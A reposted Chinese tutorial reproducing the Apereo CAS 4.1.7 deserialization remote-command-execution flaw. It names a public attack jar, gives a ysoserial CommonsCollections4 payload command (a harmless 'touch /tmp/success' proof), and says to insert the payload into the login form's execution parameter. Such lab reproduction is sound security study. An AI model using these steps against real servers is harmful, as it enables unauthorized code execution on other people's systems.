栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

Apereo CAS 4.1 反序列化命令执行漏洞

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Apereo CAS 4.1 反序列化命令执行漏洞

产品样子 影响范围: Apereo CAS <= 4.1.7

 http://your-ip:8080/cas/login 即可查看到登录页面。

我们使用(apereo-cas-attack-1.0-SNAPSHOT-all.jar)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload:

jar文件下载地址

https://github.com/vulhub/Apereo-CAS-Attack/releases.

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

使用方式:

代理登录的请求(这里注意一定是代理的登录请求不能自己瞎造请求包)否则不成功

将   payload   放入到   execution=[payload]   中其他保持原样 如下:

 

发送后即可检查命令是否执行。

 

 

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/603318.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号